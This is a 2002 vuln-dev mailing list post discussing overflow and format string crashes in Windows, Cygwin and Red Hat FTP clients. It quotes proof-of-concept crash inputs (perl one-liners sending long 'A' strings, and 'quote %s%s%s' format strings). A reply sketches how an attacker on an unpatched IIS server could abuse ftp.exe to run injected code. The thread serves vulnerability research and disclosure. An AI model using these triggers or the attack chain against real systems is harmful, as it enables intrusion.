Vulnerability Development mailing list archives
RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote?
From: "Brett Moore" <brett () softwarecreations co nz>
Date: Mon, 6 May 2002 12:47:42 +1200
Hi. You said. "This is a client-side bug the client themselves would have to exploit making it irrelevent." Think about this, because I do. IIS server, unpatched for unicode (or similar/ new variant). The server has had the cmd.exe renamed/removed/acl protected therefore preventing command execution. But they forgot FTP.exe so we bof the ftp client and inject and run any code we like therefore bypassing the 'protection' given by removing cmd.exe Brett
-----Original Message----- From: Stan Bubrouski [mailto:stan () ccs neu edu] Sent: Monday, 6 May 2002 08:02 To: lion Cc: vuln-dev () securityfocus com Subject: Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? lion wrote:Multiple vuln-devLocal Vulnerabilities in some FTP Client. 1. Windows 2000 and other Version FTP Client Overflows andFormat String Vulnerability.a. d:\>perl -e "printf 'A'x3000"|ftp Invalid command. ftp> will see the 0x4141414d memory addr not be read erroor. d:\>perl -e "printf 'open '. 'A'x3000"|ftp Already connected to (null), use disconnect first.This is a client-side bug the client themselves would have to exploit, making it irrelevent.will see the 0x4141414d memory addr not be read erroor. b. d:\>ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> debug Debugging On . ftp> cd AAAAAAAAAA¡¡ ('A' x 500) 500 Command was too long 421 Terminating connection. Connection closed by remote host. ftp> debug Debugging On . ftp> open localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp ---> USER ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: ---> PASS f 230 Anonymous user logged in. ftp> cd AAAAAAAAAAAAAAAA¡¡('A'x 2000) will see the 0x41414141 memory addr not be read erroor.Client-side, again no remote threat.ftp> ls AAAAAAAAAAAAAAAA¡¡('A'x 2000) ---> PORT 127,0,0,1,4,114 200 PORT command successful. ---> NLST AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¡¡.. will see the 0x41414141 memory addr not be read erroor.Client-side, again no remote threat.c. d:\>ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). User (lion:(none)): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> debug Debugging On . ftp> quote %s ---> quote %s 500 'QUOTE %s': command not understood ftp> quote %s%s%s ---> quote %s%s%s?(null) 500 'QUOTE %s%s%s (null)': command not understood ftp> quote %s%s%s%s%s%s%s%s ---> will see the 0x73257325 memory addr not be read erroor. Use W32Dasm isamssemble the ftp.exe, we can find the 780127A8 mov dword ptr [eax],ecx This is a character with win2000 Format Strings Vulnerability.Client-side, again no remote threat.2. Cygwin version 2.194.2.21 and Redhat 6.2 FTP Client FormatString Vulnerability.lion@LION ~ $ ftp localhost Connected to lion. 220 lion Microsoft FTP Service (Version 5.0). Name (localhost:lion): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. Remote system type is Windows_NT. ftp> debug Debugging on (debug=1). ftp> quote %s ---> %s 500 '%S': command not understood ftp> quote %s%s%s%s%s%s%s Segmentation fault (core dumped) Who can exploit it by remote? Sorry for my poor English.:) Lion lion () cnhonker net HUCNone of these bugs are remotely exploitable, and the Red Hat 6.2 FTP client was patched over a year ago and it was irrelent because it was client-side. Never-the-less these bugs should be fixed at some point for stability of the FTP clients if nothing else. Best Regards, Stan Bubrouski
Current thread:
- Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? lion (May 05)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Stan Bubrouski (May 05)
- RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? Brett Moore (May 06)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? SpaceWalker (May 06)
- RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? Brett Moore (May 06)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? SpaceWalker (May 05)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Frank Knobbe (May 08)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Stan Bubrouski (May 05)